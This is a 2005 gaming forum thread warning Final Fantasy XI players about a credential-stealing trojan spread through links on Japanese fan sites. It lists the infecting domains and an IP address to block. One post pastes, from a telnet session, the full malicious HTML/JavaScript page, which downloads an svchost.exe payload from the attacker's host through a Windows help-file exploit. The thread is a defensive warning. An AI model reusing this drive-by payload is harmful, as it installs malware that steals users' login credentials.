Yarr The Pirate!
https://w.yarrthepirate.com/phpbb3/

Trojan Warning
https://w.yarrthepirate.com/phpbb3/viewtopic.php?f=1&t=7271
Page 1 of 1

Author:  Ketrebu [ Thu Nov 10, 2005 5:47 pm ]
Post subject:  Trojan Warning

If you frequent any JP sites (such as PhotoII looking for any interesting FFXI screenshots posted) be careful what you click on. There's a trojan going around right now (circulating JP sites) in the forum of a simple Hyperlink to a couple of websites that people are just posting on these forums etc.

The website downloads a program to your computer using a bit of Javascript and a flaw in the windows help system that allows it to execute code. It download and runs a "SVCHOST.EXE" to your system, which will grab your POL ID and Password next time you log in. It's not a Key logger, it doesn't need to wait for you to type it in, it just needs you to run POL.

About 50 accounts are supposedly confirmed to be stolen by this now. The IP addresses of the sites hosting the Trojan are supposedly Chinese. Few sites known to install the trojan:

www-japan213-com
www-1102213-com
ff11-free-sakura-ne-jpi/nove/00-00.html
homepage3-nifty-com/~ffxi/Shield.html

Probably a ton more, those are just sites confirmed to do it if you visit them.

The following HEX view of the trojan executable seems to show that the program reads your login information from a temporary file in the PlayOnline Viewer folder that stores your ID and Password. It then opens what appears to be a simple ASP page that sends the author your details.

Image

The executable shows the ASP page being stored on the domain above, so the best thing to do right now would be to block that domain on your firewall. If somehow you got infected, hopefully it wouldn't be able to get through. Dots were replaced by dashes so hopefully nobody accidentally follows the link somehow. Block this:

www-japan213-com = 211-100-26-182

Note: "SVCHOST.EXE" is also the name of the Windows Service Host, and most (if not all) Firewalls will allow it access to the Internet by default. So don't expect your Firewall to trap it. It might do so, but don't give it the chance.

Author:  Ketrebu [ Thu Nov 10, 2005 6:05 pm ]
Post subject: 

Decided to try to Telnet to that server to see what happens, lol.

Code:
Welcome to Microsoft Telnet Client

Escape Character is 'CTRL+]'

Microsoft Telnet> o www,1102213,com 80

GET http://www,1102213,com/ff11help/money.htm HTTP/1.0


HTTP/1.1 200 OK
Connection: close
Date: Thu, 10 Nov 2005 23:01:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 765
ETag: "ac44b9fe62dcc51:1d5679"
Last-Modified: Sat, 29 Oct 2005 08:30:18 GMT
Content-Type: text/html

<HTML><HEAD><TITLE>INDEX</TITLE></HEAD><BODY>
<SCRIPT LANGUAGE="Script" src="http://www,1102213,com/ff11help/svchost.exe"></SC
RIPT>
<SCRIPT language=JavaScript>function sopen(){try{window.showModelessDialog("mone
y1.htm","","status:no;scroll:no;dialogHeight:100px;dialogWidth:100px;dialogTop:2
000px;dialogLeft:2000px;help:no;");self.focus();}catch(e){}}
ie=navigator.appVersion;
if(ie.indexOf("MSIE 5.0")==-1 &&
ie.indexOf("NT 5.2")==-1&&
!(ie.indexOf("NT 5.1")!=-1&&navigator.appMinorVersion.indexOf("SP2")!=-1)
){setTimeout('sopen();',0);}else{
document.write('<OBJECT Width=0 Height=0 style="display:none;" type="text/x-scri
ptlet" data="mk:@MSITStore:mhtml:c:\.mht!http://www.1102213.com/ff11help/icyfox.
chm::/%23.htm"></OBJECT>');}</SCRIPT></BODY></HTML>

Connection to host lost.

Microsoft Telnet>


Yeah, definately a trojan there, lol. If you're gonna be curious like me, make sure you know what the heck you're doing.

Author:  Fiur [ Thu Nov 10, 2005 6:08 pm ]
Post subject: 

thanks a lot for the warning ketrebu! never look at JP sites but perhaps one day by accident you may stumble upon a link or somthing. I just configed my firewall to block that site.

Author:  Reorn [ Thu Nov 10, 2005 6:14 pm ]
Post subject: 

sooo yea... how do you get your firewall to block it? haha

<< doesnt know shit about PCs

Author:  Yarr [ Thu Nov 10, 2005 6:56 pm ]
Post subject: 

Thanks for the heads up ket. Gonna avoid going on any FFXI sites with my FFXI computer.

Ill just use my laptop for all my browsing.


if anyone finds a site list it here so we know to avoid it.

Author:  Fiur [ Thu Nov 10, 2005 7:34 pm ]
Post subject: 

Reorn wrote:
sooo yea... how do you get your firewall to block it? haha

<< doesnt know shit about PCs

if you have norton 2005 just click the firewall tab and select config. then click on the Network tab and click restricted then click add then just enter the IP or site. not very complicated

Author:  Pantherxx [ Thu Nov 10, 2005 9:01 pm ]
Post subject: 

lol my anti-virus had already got this virus protected from last month and its never found that virus yet so I got lucky. :o

Author:  Kazekuro [ Fri Nov 11, 2005 3:31 am ]
Post subject: 

Thus the NA Onry movement was started!

Page 1 of 1 All times are UTC - 5 hours
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
http://www.phpbb.com/